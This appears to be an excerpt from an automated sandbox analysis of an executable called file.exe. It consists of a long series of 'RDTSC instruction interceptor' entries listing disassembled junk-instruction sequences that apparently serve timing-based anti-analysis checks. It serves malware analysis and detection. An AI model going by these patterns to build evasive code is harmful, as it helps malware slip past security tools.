                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6236BB second address: 6236E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 318B15D5h 0x0000000f push ecx 0x00000010 sub dword ptr [ebp+122D2157h], esi 0x00000016 pop edx 0x00000017 call 00007FCBA4817E79h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jno 00007FCBA4817E76h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6236E7 second address: 6236F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6236F5 second address: 623751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FCBA4817E80h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jnp 00007FCBA4817E84h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007FCBA4817E88h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623920 second address: 623924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623924 second address: 62392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623A36 second address: 623A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623A3C second address: 623A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623C6D second address: 623C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623C79 second address: 623C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623C7D second address: 623C83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623C83 second address: 623CBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+1244BA99h], edi 0x0000000f or dword ptr [ebp+122D1C48h], edi 0x00000015 push 00000004h 0x00000017 or dword ptr [ebp+1244DADBh], ecx 0x0000001d nop 0x0000001e jmp 00007FCBA4817E88h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623CBF second address: 623CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FCBA46BC736h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624337 second address: 62435E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FCBA4817E88h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62435E second address: 624363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624363 second address: 62436D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62436D second address: 62437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62450A second address: 624510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624510 second address: 603BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FCBA46BC738h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call dword ptr [ebp+122D17D4h] 0x0000002c jmp 00007FCBA46BC746h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 pop esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603BBA second address: 603BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603BBE second address: 603BC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603BC6 second address: 603BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCBA4817E76h 0x0000000a jmp 00007FCBA4817E89h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603BE9 second address: 603C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCBA46BC748h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A12 second address: 654A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A16 second address: 654A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC743h 0x00000007 jmp 00007FCBA46BC749h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FCBA46BC736h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A52 second address: 654A62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FCBA4817E78h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A62 second address: 654A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FCBA46BC736h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654C0D second address: 654C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FCBA4817E7Bh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FCBA4817E87h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654C39 second address: 654C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654C3D second address: 654C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b ja 00007FCBA4817E76h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654C4F second address: 654C69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007FCBA46BC736h 0x00000009 jns 00007FCBA46BC736h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007FCBA46BC736h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654DD4 second address: 654E22 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA4817E8Eh 0x00000008 jl 00007FCBA4817E89h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007FCBA4817E7Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62372A second address: 623751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FCBA46BC748h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654F85 second address: 654FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FCBA4817E83h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655100 second address: 655116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC740h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65527B second address: 655281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655281 second address: 655291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FCBA46BC736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655291 second address: 655295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6553C4 second address: 6553D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FCBA46BC736h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C0DE second address: 65C0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AAEB second address: 65AAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push ebx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AC36 second address: 65AC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AC3A second address: 65AC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AC40 second address: 65AC63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FCBA4817E76h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AC63 second address: 65AC7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCBA46BC736h 0x00000008 je 00007FCBA46BC736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AF4D second address: 65AF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AF53 second address: 65AF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AF5C second address: 65AF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B38B second address: 65B398 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B4EE second address: 65B508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 jnp 00007FCBA4817E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B640 second address: 65B672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCBA46BC740h 0x0000000a jbe 00007FCBA46BC73Ch 0x00000010 js 00007FCBA46BC736h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FCBA46BC73Eh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65BA9A second address: 65BA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65BF09 second address: 65BF23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC746h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65BF23 second address: 65BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA4817E7Dh 0x0000000b popad 0x0000000c js 00007FCBA4817EA4h 0x00000012 pushad 0x00000013 jnl 00007FCBA4817E76h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65BF48 second address: 65BF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66344C second address: 66345B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jng 00007FCBA4817E76h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663755 second address: 663760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BA5 second address: 663BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BAC second address: 663BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BB3 second address: 663BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BB9 second address: 663BC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BC6 second address: 663BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BCA second address: 663BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ah 0x00000007 jmp 00007FCBA46BC73Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BEB second address: 663BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663BEF second address: 663BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663179 second address: 66317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66317D second address: 663181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663181 second address: 663199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FCBA4817E7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663E93 second address: 663E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663E98 second address: 663EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 jmp 00007FCBA4817E84h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663EC6 second address: 663ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641D2 second address: 664209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FCBA4817E76h 0x0000000f jmp 00007FCBA4817E89h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 jnc 00007FCBA4817E78h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664209 second address: 664221 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FCBA46BC73Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664221 second address: 664225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664225 second address: 664229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66757C second address: 66758C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 ja 00007FCBA4817EA9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66758C second address: 667590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669C29 second address: 669C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DE83 second address: 66DE89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E2A8 second address: 66E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E88h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jmp 00007FCBA4817E84h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jno 00007FCBA4817E76h 0x00000021 jmp 00007FCBA4817E7Bh 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6727C4 second address: 6727C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6727C8 second address: 6727F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FCBA4817E84h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6727F4 second address: 672837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA46BC744h 0x0000000e pushad 0x0000000f jmp 00007FCBA46BC747h 0x00000014 jmp 00007FCBA46BC73Bh 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671F4C second address: 671F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCBA4817E76h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671F5A second address: 671F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jp 00007FCBA46BC73Ch 0x0000000d pushad 0x0000000e jmp 00007FCBA46BC743h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FCBA46BC736h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671F8E second address: 671F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676B90 second address: 676BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FCBA46BC736h 0x00000009 js 00007FCBA46BC736h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676D23 second address: 676D2D instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA4817E76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676D2D second address: 676D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007FCBA46BC736h 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007FCBA46BC736h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676D44 second address: 676D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677054 second address: 677069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC73Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677069 second address: 677075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCBA4817E76h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677372 second address: 677396 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC74Dh 0x00000008 jmp 00007FCBA46BC747h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
